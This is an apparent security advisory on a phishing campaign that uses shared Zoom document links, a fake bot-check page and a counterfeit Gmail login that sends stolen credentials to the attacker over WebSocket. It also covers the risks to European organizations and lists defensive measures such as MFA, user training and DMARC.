This phishing campaign exploits the trust users place in Zoom's document sharing feature by initiating the attack through a shared Zoom document link. Victims are first forced through a fake 'bot protection' gate, a social engineering tactic designed to mimic legitimate security checks and lower suspicion. Following this, users encounter a counterfeit Gmail login page crafted to closely resemble the authentic interface. When users input their Gmail credentials, these are immediately transmitted to the attacker via a WebSocket connection, allowing real-time credential harvesting. The attacker’s backend system validates the credentials, confirming their accuracy and enabling immediate use for further malicious activities. This attack vector does not rely on software vulnerabilities but rather on deception and user interaction, making it a classic phishing technique enhanced by leveraging trusted platforms like Zoom. The campaign is currently documented on Reddit's NetSec community with minimal discussion and no evidence of widespread exploitation or automated mass attacks. The absence of affected software versions or patches indicates this is a social engineering threat rather than a technical vulnerability. The campaign's medium severity reflects the potential for credential compromise leading to unauthorized access to Gmail accounts, which can result in data breaches, identity theft, and lateral movement within organizations. The use of Zoom as the initial trust vector is notable given its widespread adoption for remote collaboration, increasing the likelihood of users encountering such phishing attempts.

For European organizations, this phishing campaign poses a significant risk primarily through the compromise of Gmail credentials, which are often used for corporate email and access to Google Workspace services. Unauthorized access to these accounts can lead to data exfiltration, exposure of sensitive information, and further phishing or malware distribution within the organization. The use of Zoom as the initial vector is particularly impactful given the high adoption rates of Zoom for remote work across Europe, increasing the attack surface. Compromised credentials can also facilitate business email compromise (BEC) attacks, financial fraud, and reputational damage. Organizations relying heavily on Google services without enforced multi-factor authentication (MFA) are especially vulnerable. The campaign could disrupt business operations, lead to regulatory non-compliance under GDPR due to data breaches, and incur financial losses. Additionally, the psychological impact on employees and trust erosion in collaboration tools may affect productivity and security culture.

To mitigate this threat, European organizations should implement targeted user awareness training focused on recognizing phishing attempts that exploit trusted platforms like Zoom. Enforce multi-factor authentication (MFA) on all Google Workspace accounts to prevent unauthorized access even if credentials are compromised. Deploy email and web gateway filters to detect and block phishing URLs, especially those mimicking legitimate services. Monitor login activity for anomalous behavior such as logins from unusual locations or devices. Encourage users to verify URLs carefully and avoid entering credentials on pages accessed via unsolicited links, even if they appear to be from trusted sources. Utilize endpoint protection solutions capable of detecting and blocking phishing payloads and suspicious WebSocket connections. Regularly review and update incident response plans to include phishing scenarios involving collaboration tools. Collaborate with Zoom and Google support channels to report phishing URLs and take down malicious content promptly. Finally, consider implementing domain-based message authentication, reporting, and conformance (DMARC) policies to reduce email spoofing risks.